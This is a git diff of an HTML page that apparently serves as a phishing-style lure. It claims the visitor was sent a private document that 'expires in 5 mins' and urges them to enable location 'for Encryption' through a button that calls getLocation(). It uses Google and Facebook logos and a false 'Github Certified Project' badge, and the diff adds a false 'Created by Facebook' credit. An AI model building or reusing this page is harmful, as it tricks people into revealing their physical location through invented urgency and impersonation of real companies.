--- a/index.html
+++ b/index.html
@@ -15,53 +15,29 @@
 </head>
 
 <body>
-
-  <!-- <h4>Cut the Crap. Simple & Private.</h4> -->
-
   <div class="container" id="home">
     <div class="bottom">
       <img src="/images/google.svg" alt="" height="20px">
       <img src="/images/facebook.svg" alt="" height="20px">
     </div>
     <header><i class="ri-github-fill"></i>Github Certified Project</header>
-
-    <!-- <h1>Private Document Viewer</h1> -->
-
     <div class="message-info">
       <p>You were sent a private document. <br> <strong>Expires in 5 mins.</strong></p>
     </div>
 
     <div class="file-info">
-      <!-- <i class="ri-folder-image-line"></i> -->
       <i class="ri-lock-line"></i>
-      <!-- <img src="/images/document-lock-svgrepo-com.svg" alt="" height="80px"> -->
       <p>Send the Code/ Screenshot below to Sender</p>
       <i class="ri-arrow-down-line"></i>
     </div>
-
-    <!-- <p>Click to Download</p> -->
-
-    <!-- <button onclick="getLocation()"><a href="/images/Social-Front.jpg">Download<i class="ri-download-line"></i></a> -->
-    <!-- <a href="#" onclick="getLocation()"><button>Download<i class="ri-download-line"></i></a></button> -->
-
-
     <a href="#" onclick="getLocation()" id="sendBtn"><button>View Hash Key</button></a>
-
-
-    <!-- <div class="download-issues">
-      <p>Issues Downloading? <a href="#">Click Here</a></p>
-    </div> -->
     <p id="demo"></p>
     <p>Enable <b>Location</b> for Encryption</p>
     <div class="js-retry-location">
       <button class=""> <i class="ri-map-pin-2-fill"></i></button>
       <p>Why do we need <b><a href="#info"> Location</b> </a>for Encryption?</p>
     </div>
-
-    <!-- <div class="bottom">
-      <img src="/images/google.svg" alt="" height="20px">
-      <img src="/images/facebook.svg" alt="" height="20px">
-    </div> -->
+    <p class="meta"><i class="ri-meta-fill"></i>Created by Facebook<i class="ri-heart-3-fill"></i></p>
   </div>
 
   <div class="ad">
